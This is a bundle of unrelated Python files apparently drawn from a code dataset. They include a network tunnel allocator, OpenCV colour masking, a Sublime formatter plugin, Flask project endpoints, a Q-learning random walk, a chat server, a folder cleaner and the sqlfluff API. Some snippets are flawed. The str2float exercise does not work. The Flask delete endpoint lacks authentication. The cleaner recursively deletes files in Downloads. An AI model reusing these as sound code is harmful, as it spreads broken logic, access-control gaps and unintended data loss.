tunnelLowDropRate = 0\n\n def __init__(self, lowCapacity, highCapacity, highNormal):\n self.tunnelLowCapacity = lowCapacity\n self.tunnelHighCapacity = highCapacity\n self.tunnelHighNormal = highNormal\n\n def flowAllocation(self, flowID, flowPriority, flowIntensity, flowType):\n if self.tunnelLowUse < self.tunnelHighUse:\n self.tunnelLowFlows.append([flowPriority, flowIntensity, flowID, flowType])\n self.tunnelLowUse += flowIntensity\n self.tunnelLowSum += flowPriority\n else:\n if self.tunnelHighUse/self.tunnelHighCapacity < self.tunnelHighNormal:\n self.tunnelHighFlows.append([flowPriority, flowIntensity, flowID, flowType])\n self.tunnelHighUse += flowIntensity\n self.tunnelHighSum += flowPriority\n else:\n if self.tunnelHighUse > self.tunnelHighCapacity:\n self.tunnelLowFlows.append([flowPriority, flowIntensity, flowID, flowType])\n self.tunnelLowUse += flowIntensity\n self.tunnelLowSum += flowPriority\n else:\n if flowPriority > self.tunnelHighSum/len(self.tunnelHighFlows):\n self.tunnelHighFlows.append([flowPriority, flowIntensity, flowID, flowType])\n self.tunnelHighUse += flowIntensity\n self.tunnelHighSum += flowPriority\n else:\n self.tunnelLowFlows.append([flowPriority, flowIntensity, flowID, flowType])\n self.tunnelLowUse += flowIntensity\n self.tunnelLowSum += flowPriority\n\n def tunnelLowFilter(self):\n self.tunnelLowDrop = {}\n self.tunnelLowDropRate = 0\n\n if self.tunnelLowUse > self.tunnelLowCapacity:\n tunnelDropRate = self.tunnelLowUse - self.tunnelLowCapacity\n totalTunnelDrop = self.tunnelLowUse - self.tunnelLowCapacity\n\n for flow in self.tunnelLowFlows:\n #dropFactor = (1-flow[0]) + (flow[0]*0.1)\n #dropFactor = 1-flow[0]\n dropFactor = ((1 - flow[0]) + (((1 - flow[0]) + (flow[0] * 0.1)) * (tunnelDropRate / totalTunnelDrop)))\n if dropFactor > 1:\n dropFactor = 1\n flowDrop = flow[1] * dropFactor\n if flowDrop < tunnelDropRate:\n self.tunnelLowDrop[flow[2]] = round(flowDrop, 0)\n tunnelDropRate -= flowDrop\n self.tunnelLowDropRate += flowDrop\n else:\n self.tunnelLowDrop[flow[2]] = round(tunnelDropRate,0)\n self.tunnelLowDropRate += tunnelDropRate\n break","sub_path":"Solutions/VGuard.py","file_name":"VGuard.py","file_ext":"py","file_size_in_byte":3837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"422258455","text":"import cv2\nimport numpy as np\nimport time\nimport argparse\n\n\n\nprint(\"\"\"\n*******Green color detection test******\n \"\"\")\n\n\n\n\nimg = cv2.imread('test.jpeg')\n# Converting the color space from BGR to HSV\nhsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n# Generating mask to detect green color\nlower_green = np.array([40,5,80])\nupper_green= np.array([80,255,255])\nmask1 = cv2.inRange(hsv,lower_green,upper_green)\n\nlower_green= np.array([140,5,80])\nupper_green= np.array([180,255,255])\nmask2 = cv2.inRange(hsv,lower_green,upper_green)\n\n\nmask1 = mask1+mask2\n\nmask1 = cv2.morphologyEx(mask1, cv2.MORPH_OPEN, np.ones((1,1),np.uint8),iterations=2)\nmask1 = cv2.dilate(mask1,np.ones((1,1),np.uint8),iterations = 1)\nmask2 = cv2.bitwise_not(mask1)\n\ncv2.imshow('Result!!!',mask2)\ncv2.imwrite('Test_green.jpg', mask2 ) \n\n\n\n","sub_path":"demo (1).py","file_name":"demo (1).py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"607110129","text":"from pyke import knowledge_engine\nimport logging\nfrom EnvNav import EnvNav\n\n\nclass KbExpert:\n\n def __init__(self,\n log=None,\n conf=None):\n self.conf = conf\n if conf is None:\n self.conf = dict(name=\"KBExpert\",\n rule_name=\"rules\")\n self.log = log\n self.output(\"Starting\", \"info\")\n self.contexts_tree = EnvNav()\n self.engine = knowledge_engine.engine((__file__, '.rules'))\n self.context_all_facts = []\n self.rules = self.conf[\"rule_name\"]\n\n def set_rules(self, rules):\n self.rules = rules\n\n def get_contexts_tree(self):\n return self.contexts_tree\n\n def set_context_tree(self, tree):\n self.contexts_tree = tree\n\n def add_context_tree(self, cont):\n self.contexts_tree.add_context(cont)\n self.get_facts_from_all_contexts()\n\n def get_context_all_facts(self):\n return self.context_all_facts\n\n def get_facts_from_all_contexts(self):\n self.context_all_facts=[]\n for contexts in self.contexts_tree.get_contexts():\n self.get_env_fromNav(contexts, [contexts.__module__])\n return self.context_all_facts\n\n def get_env_fromNav(self, model, names):\n fl = True\n for val in model.__dict__.keys():\n if val == \"value\":\n tup = {\"sys\": \"\", \"sens\": \"\", \"values\": \"\"}\n values = []\n aux = 0\n for n in names:\n aux = aux + 1\n if aux == 1:\n tup[\"sys\"] = n\n elif aux == 2:\n tup[\"sens\"] = n\n else:\n values.append(n)\n values.append(model.value)\n tup[\"values\"] = values\n self.context_all_facts.append(tup)\n fl = False\n if fl:\n for val in model.__dict__.keys():\n names.append(val)\n model2 = getattr(model, val)\n self.get_env_fromNav(model2, names)\n names.pop()\n\n def assert_rules(self):\n self.engine.activate(self.rules)\n for e in self.context_all_facts:\n self.engine.assert_(str(e['sys']), str(e['sens']), e['values'])\n try:\n vals, plans = self.engine.prove_1_goal(\n self.rules+'.toret($sens,$value,$ret)')\n toret = dict(vals=vals, plans=plans)\n self.output(vals, \"debug\")\n self.engine.reset()\n return toret\n except knowledge_engine.CanNotProve:\n toret = dict(vals=None, plans=None)\n self.output(\"No rules applies\", \"debug\")\n self.engine.reset()\n return toret\n except AssertionError:\n toret = dict(vals=None, plans=None)\n self.output(\"Assertion Error\", \"critical\")\n self.engine.reset()\n return toret\n self.engine.reset()\n toret = dict(vals=None, plans=None)\n return toret\n\n def output(self,\n msg,\n lvl=\"info\"):\n if self.log is not None:\n getattr(self.log, lvl)(self.conf[\"name\"] + \": \" + str(msg))\n\n\nif __name__ == \"__main__\":\n env = EnvNav()\n kb = KbExpert()\n","sub_path":"resources/KBManager.py","file_name":"KBManager.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"645291074","text":"import re\nimport subprocess\n\nimport sublime\nimport sublime_plugin\n\nfrom .settings import (\n PKG_SETTINGS_KEY_ENABLED,\n PKG_SETTINGS_KEY_EXCLUDE,\n PKG_SETTINGS_KEY_EXTEND_EXCLUDE,\n PKG_SETTINGS_KEY_EXTEND_INCLUDE,\n PKG_SETTINGS_KEY_INCLUDE,\n pkg_settings,\n)\nfrom .sublime_extra import log_and_present_current_exn, platform_startupinfo\n\n# @todo #0 Why does cursor position advance forward after each save when using e.g.\n# pg_format on the .sql file:\n# CREATE TABLE persons (\n# personid INT\n# , lastname VARCHAR(255)\n# , firstname VARCHAR(255)\n# , address VARCHAR(255)\n# , city VARCHAR(255)\n# );\n\n\nclass PreSaveFormat(sublime_plugin.TextCommand):\n\n TXT_ENCODING = \"utf-8\"\n\n # Overrides --------------------------------------------------\n\n def run(self, edit, command, append_file_path_to_command=False, **_):\n try:\n self.run_core(edit, command, append_file_path_to_command)\n except Exception:\n log_and_present_current_exn()\n\n # ------------------------------------------------------------\n\n def run_core(self, edit, command, append_file_path_to_command):\n view_region = sublime.Region(0, self.view.size())\n view_content = self.view.substr(view_region)\n view_content_started_empty = len(view_content) == 0\n\n view_file_path = self.view.file_name()\n if append_file_path_to_command:\n command.append(view_file_path)\n\n # Allow e.g. numbers to be unquoted in the settings file (4 instead of \"4\")\n command = [str(component) for component in command]\n\n print( # noqa: T001\n \"[{0}] Running process {1} fed with content of view {2}\".format(\n PreSaveFormat.__name__, command, view_file_path\n )\n )\n child_proc = subprocess.Popen(\n command,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n startupinfo=platform_startupinfo(),\n )\n stdout_content_bytes, stderr_content_bytes = child_proc.communicate(\n input=bytes(view_content, self.TXT_ENCODING)\n )\n stdout_content, stderr_content = (\n stdout_content_bytes.decode(self.TXT_ENCODING),\n self.postprocess_stderr(stderr_content_bytes.decode(self.TXT_ENCODING)),\n )\n\n if child_proc.returncode != 0:\n print( # noqa: T001\n \"\\n\\n*** [{0}] stderr of `{1}` was:\\n\\n{2}\\n\\n\".format(\n PreSaveFormat.__name__, command[0], stderr_content\n )\n )\n sublime.set_timeout(\n lambda: sublime.status_message(\n \"{0} failed - see console\".format(command[0]).upper()\n ),\n 100,\n )\n return\n\n if not len(stdout_content) and not view_content_started_empty:\n raise Exception(\n \"[{0}] '{1}' command produced no output \"\n \"despite exiting successfully.\".format(\n PreSaveFormat.__name__, command[0]\n )\n )\n self.view.replace(edit, view_region, stdout_content)\n\n def postprocess_stderr(self, s):\n # Remove ANSI colour codes\n s = re.sub(\"\\x1b\\\\[\\\\d{1,2}m\", \"\", s) # noqa: FS003\n return s.strip()\n\n\n# @todo #0 Key the settings file on pos0 scope selectors (like BuildOnSave) rather than\n# path of view's syntax definition. That way, stuff like JS & TS, C & C++ can share one\n# settings block that has an appropriate selector, rather than duplicating blocks.\n\n\nclass PreSaveListener(sublime_plugin.ViewEventListener):\n\n # Overrides --------------------------------------------------\n\n @classmethod\n def is_applicable(cls, settings):\n return cls.settings_for_view_language(settings) is not None\n\n @classmethod\n def applies_to_primary_view_only(cls):\n return False\n\n def on_pre_save(self):\n try:\n lang_settings = self.settings_for_view_language(self.view.settings())\n if isinstance(lang_settings, list):\n steps = lang_settings\n else:\n steps = [lang_settings]\n\n for step in steps:\n if self.should_format(self.view.file_name(), step):\n self.view.run_command(PreSaveFormat(None).name(), step)\n except Exception:\n log_and_present_current_exn()\n\n # ------------------------------------------------------------\n\n @classmethod\n def settings_for_view_language(cls, view_settings):\n view_syntax_path = view_settings.get(\"syntax\")\n return pkg_settings().get(view_syntax_path)\n\n def load_extensible_settings_list(self, priority_settings, key, extension_key):\n lst = priority_settings.get(key, pkg_settings().get(key))\n lst.extend(\n priority_settings.get(extension_key, pkg_settings().get(extension_key, []))\n )\n return lst\n\n def should_format(self, path, lang_settings):\n if not lang_settings.get(PKG_SETTINGS_KEY_ENABLED, True):\n return False\n\n includes = self.load_extensible_settings_list(\n lang_settings, PKG_SETTINGS_KEY_INCLUDE, PKG_SETTINGS_KEY_EXTEND_INCLUDE\n )\n excludes = self.load_extensible_settings_list(\n lang_settings, PKG_SETTINGS_KEY_EXCLUDE, PKG_SETTINGS_KEY_EXTEND_EXCLUDE\n )\n\n # @todo #0 Use Python stdlib \"glob\" rather than basic substring matching.\n # And add a comment in the default settings file explaining the logic.\n include_hits = [fragment in path for fragment in includes]\n exclude_hits = [fragment in path for fragment in excludes]\n return any(include_hits) and not any(exclude_hits)\n","sub_path":"src/format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":5780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"51299752","text":"from functools import reduce\r\ndef str2float(s):\r\n s1, s2 = s.split('.')\r\n def char2num(a):\r\n digits = {'0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9}\r\n return digits[a]\r\n def num2numSeries(x, y):\r\n return x * 10 + y\r\n \r\n result = reduce(map(num2numSeries, s1)) + reduce(map(num2numSeries, s2)) / len(s2)\r\n return result\r\n\r\n\r\n\r\nprint('str2float(\\'123.456\\') =', str2float('123.456'))\r\nif abs(str2float('123.456') - 123.456) < 0.00001:\r\n print('测试成功!')\r\nelse:\r\n print('测试失败!')\r\n","sub_path":"str2float.py","file_name":"str2float.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"345776432","text":"from flask_restful import Resource\nfrom flask import request\nfrom werkzeug.security import safe_str_cmp\nfrom flask_jwt_extended import (\n jwt_refresh_token_required,\n get_jwt_identity,\n jwt_required,\n get_raw_jwt,\n fresh_jwt_required\n)\nfrom marshmallow import ValidationError\nfrom models import db, ma, ProjectModel, ProjectSchema, UserModel, UserSchema\n\nPROJECT_ALREADY_EXISTS = \"A project with that name already exists.\"\nCREATED_SUCCESSFULLY = \"Project created successfully.\"\nPROJECT_NOT_FOUND = \"Project not found.\"\nPROJECT_DELETED = \"Project deleted.\"\nINVALID_CREDENTIALS = \"Invalid credentials!\"\n\nproject_schema = ProjectSchema()\nproject_list_schema = ProjectSchema(many=True)\nuser_schema = UserSchema()\n\n\nclass ProjectCreate(Resource):\n @classmethod\n @jwt_required\n def put(cls, user_id: int):\n project_json = request.get_json()\n user = UserModel.find_by_id(user_id)\n current_user = get_jwt_identity()\n\n if user and user.id == current_user:\n try:\n project = project_schema.load(request.get_json())\n except ValidationError as err:\n return err.messages, 400\n\n if project in user.projects:\n return {\"message\": \"Project exists\"}, 400\n else:\n user.projects.append(project)\n\n project.save_to_db()\n user.save_to_db()\n return project_schema.dump(project), 200\n else:\n return{\"message\": INVALID_CREDENTIALS}, 401\n\n\nclass Project(Resource):\n @classmethod\n def get(cls, project_id: int):\n project = ProjectModel.find_by_id(project_id)\n if not project:\n return {\"message\": PROJECT_NOT_FOUND}, 404\n\n return project_schema.dump(project), 200\n\n @classmethod\n def delete(cls, project_id: int):\n project = ProjectModel.find_by_id(project_id)\n if not project:\n return {\"message\": PROJECT_NOT_FOUND}, 404\n\n project.delete_from_db()\n return {\"message\": PROJECT_DELETED}, 200\n\n\nclass ProjectList(Resource):\n @classmethod\n def get(cls, user_id: int):\n return {\"projects\": project_list_schema.dump(ProjectModel.find_all_user(user_id))}, 200\n","sub_path":"server/resources/Project.py","file_name":"Project.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"455811581","text":"from Component_py.stubs import require, __pragma__ # __:skip\nfrom Component_py.component import destruct\n\nReact = require(\"react\")\nFormGroup, Label, Input = destruct(\n require(\"reactstrap\"), \"FormGroup\", \"Label\", \"Input\")\n\n\ndef FormPanel(props):\n def on_text_change(e):\n props.form_panel_update(e.target.value)\n\n return __pragma__(\"xtrans\", None, \"{}\", \"\"\" (\n \n \n \n \n ); \"\"\")\n","sub_path":"src/components/FormPanel.py","file_name":"FormPanel.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"370563165","text":"from . import RLinterface3 as RLinterface\nimport random\n\n\n# Random walk example using RL interface\n\ndef argmaxrandom(values):\n \"Returns the index of the maximum entry in the list of values\"\n best_index = 0\n best_value = values[0]\n numties = 1\n for i in range(len(values)):\n val = values[i]\n if val < best_value: # our older value is better\n pass\n elif val > best_value: # the new value is better\n best_index = i\n best_value = val\n else: # there is a tie; randomly pick\n numties += 1\n if random.randrange(0, numties) == 0: # chose the new one\n best_index = i\n best_value = val\n return best_index # old version returned index and value - change?\n\n\nclass Agent:\n \"Random walk agent\"\n\n def __init__(self, epsilon=0.1, alpha=0.1, gamma=0.9):\n self.epsilon = epsilon\n self.alpha = alpha\n self.gamma = gamma\n\n def agentChoose(self, s):\n \"Chooses the next action using epsilon-greedy\"\n if random.random() < self.epsilon:\n self.lasta = random.randrange(self.numactions)\n else:\n self.lasta = argmaxrandom(self.Q[s])\n self.lasts = s\n # print \"Agent chose action\", self.lasta\n return self.lasta\n\n def statevalue(self, s):\n if s == None:\n return 0\n elif s == 'terminal':\n return 0\n else:\n return max(self.Q[s])\n\n def agentLearn(self, s, a, r, sp):\n \"Learns from the last action done - doing Qlearning\"\n # print \"Learning from state\", s, \"action\", a, \"reward\", r, \"next s\", sp\n self.Q[s][a] += self.alpha * \\\n (r + (self.gamma * self.statevalue(sp)) \\\n - self.Q[s][a])\n\n def agent_init(self, taskspec):\n \"Initialize the agent\"\n # print \"Initializing agent with \", taskspec\n self.numactions, self.numstates = taskspec\n self.lasta = 0\n self.lasts = 0\n self.Q = [[0.0 for i in range(self.numactions)] \\\n for j in range(self.numstates)]\n\n def agent_start(self, s):\n \"Return the first action\"\n self.lasts = s\n return self.agentChoose(s)\n\n def agent_step(self, r, s):\n \"Learns and gets the next action\"\n self.agentLearn(self.lasts, self.lasta, r, s)\n self.lasts = s\n return self.agentChoose(s)\n\n def agent_end(self, r):\n \"Learns and gets the next action\"\n self.agentLearn(self.lasts, self.lasta, r, 'terminal')\n\n\nclass Environment:\n \"Random walk environment\"\n\n def __init__(self, numstates, numactions=2):\n self.numactions = numactions\n self.numstates = numstates\n\n def env_init(self):\n self.curstate = self.numstates // 2 # start in the middle\n return self.numactions, self.numstates\n\n def env_start(self):\n \"Returns the initial state\"\n self.curstate = self.numstates // 2 # start in the middle\n # print \"Environment initializing state to\", self.curstate\n return self.curstate\n\n def env_step(self, a):\n \"Does the action and returns the next state and reward\"\n if a == 0:\n self.curstate -= 1 # First action, go left\n elif a == self.numactions - 1:\n self.curstate += 1 # Last action, go right\n\n if self.curstate == 0: # reached left end\n self.curstate = 'terminal'\n r = -1\n elif self.curstate == self.numstates - 1: # reached right end\n self.curstate = 'terminal'\n r = 1\n else:\n r = 0\n # print \"Environment did action\", a, \"got new state\", self.curstate, \"and reward\", r\n return r, self.curstate\n\n\nagt = Agent()\nenv = Environment(10)\nrli = RLinterface.RLinterface(agt, env)\n\n# rli.RL_init()\n\nfor i in range(30):\n eps = rli.RL_episode()\n print(eps)\n print((\"Reward\", eps[-1], \"took\", rli.RL_num_steps(), \"steps\"))\n","sub_path":"RLtoolkit/rlitest3b.py","file_name":"rlitest3b.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"227548923","text":"# Remaking the scales.py file from the bottom up because I'm bad at coding\n\n'''\nThis file containts all the functions (\"scales\") for the filesnake program\n'''\n\n###########\n# Imports #\n###########\n\nimport os\nimport shutil\nimport sys # for checking Python version\nfrom sys import platform as _platform # For OS Checking\nimport csv\n\n#//////////////////////////////////////////////////////////////////////#\n\n#############\n# Variables #\n#############\n\ntmpdesktop = os.path.join(\"C:\\\\\", \"Users\", \"Jack\", \"Desktop\", \"Tiny Desktop\", \"tmp\")\ndownloads = os.path.join('C:\\\\', 'Users', 'Jack', 'Downloads')\n\nkeep = ('keep' or 'Keep') # name of file in directory to not be deleted\n\n#//////////////////////////////////////////////////////////////////////#\n\n##########\n# Scales # Remember, scales are just my dumb way of saying \"functions\"\n##########\n\n\ndef clear():\n\tos.system('cls' if os.name == 'nt' else 'clear') # Clears terminal window of text\n\n\ndef setbeenrun(): # Only run certain functions the first time the script is run\n\n\twith open(os.path.join('Data','firstrun.txt'),'r+') as beenrun:\n\t\tbeenrun.write('True')\n\n\ndef welcomemsg():\n\tclear()\n\n\tinput(\"\\n\\nWelcome to the cleaner!\" + '\\n' + 'Press any key to continue...')\n\tclear()\n\tcleantool()\n\n\ndef rerun():\n\tchoice = ''\n\tchoice = input('\\n' + 'Would you like to run the cleaner again? Y or N: ').upper()\n\n\tif choice == 'Y':\n\t\tcleantool()\n\telif choice == 'N':\n\t\texit()\n\telse:\n\t\tprint(\"Not a valid response.\")\n\t\trerun()\n\n\ndef folderCleaner(target):\n\ttry:\n\t\tfor root, dirs, files in os.walk(target):\n\t\t\tfor name in files:\n\t\t\t\tif (keep not in root and keep not in name):\n\t\t\t\t\tos.unlink(os.path.join(root, name))\n\t\t\tfor name in dirs:\n\t\t\t\tif (keep not in root and keep not in name):\n\t\t\t\t\tshutil.rmtree(os.path.join(root, name))\n\n\t\t\tinput(\"The folder has been cleaned! Press any key to continue...\")\n\t\t\trerun()\n\texcept:\n\t\tinput(\"The cleaner did not finish successfully. Press any key to continue...\")\n\t\trerun()\n\n\ndef cleantool():\n\tclear()\n\tchoice = ''\n\tchoice = input('Which directory do you want to clean?' + '\\n' + '(D)ownloads or (T)mpdesktop?: ').upper()\n\n\tif choice == \"T\":\n\t\tfolderCleaner(tmpdesktop)\n\telif choice == \"D\":\n\t\tfolderCleaner(downloads)\n\telse:\n\t\tprint(\"Invalid choice.\")\n\t\tcleantool()\n\nsetbeenrun() # test to see that setbeenrun() works; it does!","sub_path":"scales.py","file_name":"scales.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"361973380","text":"\n\nfrom xai.brain.wordbase.nouns._fifteenth import _FIFTEENTH\n\n#calss header\nclass _FIFTEENTHS(_FIFTEENTH, ):\n\tdef __init__(self,): \n\t\t_FIFTEENTH.__init__(self)\n\t\tself.name = \"FIFTEENTHS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"fifteenth\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_fifteenths.py","file_name":"_fifteenths.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"455372517","text":"import pygame\r\nimport socket\r\n\r\n# Define socket host and port\r\nimport threading\r\n\r\nfrom Hall import Hall\r\n\r\nclass Client:\r\n def __init__(self, sock, client_name):\r\n self.sock = sock\r\n self.client_name = client_name\r\n\r\nSERVER_HOST = '0.0.0.0'\r\nSERVER_PORT = 8000\r\n\r\n# Create socket\r\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nserver_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\nserver_socket.bind((SERVER_HOST, SERVER_PORT))\r\nserver_socket.listen(1)\r\nprint('Listening on port %s ...' % SERVER_PORT)\r\n\r\nclients = []\r\nhall = Hall('#general')\r\n\r\ndef handle_client(client):\r\n while True:\r\n # Recebe mensagem do cliente\r\n msg = client.sock.recv(1024).decode()\r\n\r\n if msg == 'exit':\r\n goodbyeMsg = 'exit'\r\n client.sock.sendall(goodbyeMsg.encode())\r\n\r\n name = client.client_name\r\n clients.remove(client)\r\n hall.remove_client(client)\r\n leaveMsg = name + ' has left the chat'\r\n for client in clients:\r\n client.sock.sendall(leaveMsg.encode())\r\n break\r\n\r\n if msg != 'exit':\r\n # Imprime a mensagem do cliente\r\n hall.handle_msg(client, msg)\r\n\r\nwhile True:\r\n # Wait for client connections\r\n client_connection, client_address = server_socket.accept()\r\n\r\n # Obtém o nome do utilizador\r\n while True:\r\n name = client_connection.recv(1024).decode()\r\n client = Client(client_connection, name)\r\n if hall.check_Username(client) == False:\r\n clients.append(client)\r\n client.sock.sendall('Username Accepted'.encode())\r\n break\r\n else:\r\n client.sock.sendall('Username Declined'.encode())\r\n\r\n # Hall cumprimenta o novo cliente\r\n entryMsg = hall.welcome_new(client)\r\n\r\n msg = 'User ' + name + ' is now connected!'\r\n hall.broadcastNews(msg, client)\r\n client.sock.sendall(entryMsg.encode())\r\n\r\n # Cria Threads\r\n thread = threading.Thread(target=handle_client, args=(client, ))\r\n thread.start()","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"421388272","text":"from django.forms import FileInput, CheckboxInput\nfrom django import forms\nfrom django.utils.html import conditional_escape, format_html\nfrom django.utils.encoding import force_text\nfrom django.utils.safestring import mark_safe\nfrom django.utils.translation import ugettext, ugettext_lazy\nimport os\n\nclass SecureFileInput(FileInput):\n\n\tinitial_text = ugettext_lazy('Currently')\n\tinput_text = ugettext_lazy('Change')\n\tclear_checkbox_label = ugettext_lazy('Clear')\n\n\ttemplate_with_initial = 'Currently: %(initial)s %(clear_template)s
        %(input_text)s: %(input)s'\n\n\ttemplate_with_clear = '%(clear)s '\n\n\tdef __init__(self, data_source_url, attrs=None):\n\t\tself.data_source_url = data_source_url\n\t\tsuper(SecureFileInput, self).__init__(attrs)\n\n\tdef render(self, name, value, attrs=None):\n\t\tsubstitutions = {\n\t\t\t'initial_text': self.initial_text,\n\t\t\t'input_text': self.input_text,\n\t\t\t'clear_template': '',\n\t\t\t'clear_checkbox_label': self.clear_checkbox_label,\n\t\t}\n\t\ttemplate = '%(input)s'\n\t\tsubstitutions['input'] = super(SecureFileInput, self).render(name, value, attrs)\n\n\t\tif value and hasattr(value, \"url\"):\n\t\t\ttemplate = self.template_with_initial\n\t\t\tsubstitutions['initial'] = format_html('{1}',\n\t\t\t\t\t\t\t\t\t\t\t\t force_text(self.data_source_url),\n\t\t\t\t\t\t\t\t\t\t\t\t force_text(os.path.basename(value.name)))\n\t\t\tif not self.is_required:\n\t\t\t\tcheckbox_name = self.clear_checkbox_name(name)\n\t\t\t\tcheckbox_id = self.clear_checkbox_id(checkbox_name)\n\t\t\t\tsubstitutions['clear_checkbox_name'] = conditional_escape(checkbox_name)\n\t\t\t\tsubstitutions['clear_checkbox_id'] = conditional_escape(checkbox_id)\n\t\t\t\tsubstitutions['clear'] = CheckboxInput().render(checkbox_name, False, attrs={'id': checkbox_id})\n\t\t\t\tsubstitutions['clear_template'] = self.template_with_clear % substitutions\n\n\t\treturn mark_safe(template % substitutions)\n\n\n\tdef clear_checkbox_name(self, name):\n\t\t\"\"\"\n\t\tGiven the name of the file input, return the name of the clear checkbox\n\t\tinput.\n\t\t\"\"\"\n\t\treturn name + '-clear'\n\n\tdef clear_checkbox_id(self, name):\n\t\t\"\"\"\n\t\tGiven the name of the clear checkbox input, return the HTML id for it.\n\t\t\"\"\"\n\t\treturn name + '_id'\n\n\tdef value_from_datadict(self, data, files, name):\n\t\tupload = super(SecureFileInput, self).value_from_datadict(data, files, name)\n\t\tif not self.is_required and CheckboxInput().value_from_datadict(\n\t\t\tdata, files, self.clear_checkbox_name(name)):\n\t\t\tif upload:\n\t\t\t\t# If the user contradicts themselves (uploads a new file AND\n\t\t\t\t# checks the \"clear\" checkbox), we return a unique marker\n\t\t\t\t# object that FileField will turn into a ValidationError.\n\t\t\t\treturn FILE_INPUT_CONTRADICTION\n\t\t\t# False signals to clear any existing value, as opposed to just None\n\t\t\treturn False\n\t\treturn upload","sub_path":"assignments/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"316882971","text":"def sum_values(*args):\n total = 0\n for num in args:\n total += num\n return total\n\nnums = [1,2,3,4,5,6]\nprint(sum_values(*nums))\n\n\n\ndef add_mult(a,b,c, **kwargs):\n print(a+b*c)\n print(kwargs)\n\ndata = dict(a=2, b=3, c=4, name=\"tony stark\", age=55)\nprint(add_mult(**data, cat=\"blue\"))","sub_path":"functions/funcs_two/unpack.py","file_name":"unpack.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"179603610","text":"\"\"\"Is our reference hackery usable.\"\"\"\n\nfrom pyiem import reference\n\n\ndef test_reference():\n \"\"\"Can we import everything from our API.\"\"\"\n for name in reference._onthefly_dict:\n res = getattr(reference, name, None)\n # is a dictionary\n assert isinstance(res, dict)\n # has keys\n assert res.keys()\n","sub_path":"tests/test_reference.py","file_name":"test_reference.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"586813147","text":"\"\"\"The simple public API methods.\"\"\"\n\nfrom sqlfluff.core import Linter\n\n\nclass APIParsingError(ValueError):\n \"\"\"An exception which holds a set of violations.\"\"\"\n\n def __init__(self, violations, **kwargs):\n self.violations = violations\n self.msg = f\"Found {len(violations)} issues while parsing string.\"\n for viol in violations:\n self.msg += f\"\\n{viol!s}\"\n super().__init__(self.msg, **kwargs)\n\n\ndef _unify_str_or_file(sql):\n \"\"\"Unify string and files in the same format.\"\"\"\n if not isinstance(sql, str):\n try:\n sql = sql.read()\n except AttributeError:\n raise TypeError(\"Value passed as sql is not a string or a readable object.\")\n return sql\n\n\ndef lint(sql, dialect=\"ansi\", rules=None):\n \"\"\"Lint a sql string or file.\n\n Args:\n sql (:obj:`str` or file-like object): The sql to be linted\n either as a string or a subclass of :obj:`TextIOBase`.\n dialect (:obj:`str`, optional): A reference to the dialect of the sql\n to be linted. Defaults to `ansi`.\n rules (:obj:`str` or iterable of :obj:`str`, optional): A subset of rule\n reference to lint for.\n\n Returns:\n :obj:`list` of :obj:`dict` for each violation found.\n \"\"\"\n sql = _unify_str_or_file(sql)\n linter = Linter(dialect=dialect, rules=rules)\n\n result = linter.lint_string_wrapped(sql)\n result_records = result.as_records()\n # Return just the violations for this file\n return [] if not result_records else result_records[0][\"violations\"]\n\n\ndef fix(sql, dialect=\"ansi\", rules=None):\n \"\"\"Fix a sql string or file.\n\n Args:\n sql (:obj:`str` or file-like object): The sql to be linted\n either as a string or a subclass of :obj:`TextIOBase`.\n dialect (:obj:`str`, optional): A reference to the dialect of the sql\n to be linted. Defaults to `ansi`.\n rules (:obj:`str` or iterable of :obj:`str`, optional): A subset of rule\n reference to lint for.\n\n Returns:\n :obj:`str` for the fixed sql if possible.\n \"\"\"\n sql = _unify_str_or_file(sql)\n linter = Linter(dialect=dialect, rules=rules)\n\n result = linter.lint_string_wrapped(sql, fix=True)\n fixed_string = result.paths[0].files[0].fix_string()[0]\n return fixed_string\n\n\ndef parse(sql, dialect=\"ansi\"):\n \"\"\"Parse a sql string or file.\n\n Args:\n sql (:obj:`str` or file-like object): The sql to be linted\n either as a string or a subclass of :obj:`TextIOBase`.\n dialect (:obj:`str`, optional): A reference to the dialect of the sql\n to be linted. Defaults to `ansi`.\n\n Returns:\n :obj:`ParsedString` containing the parsed structure.\n \"\"\"\n sql = _unify_str_or_file(sql)\n 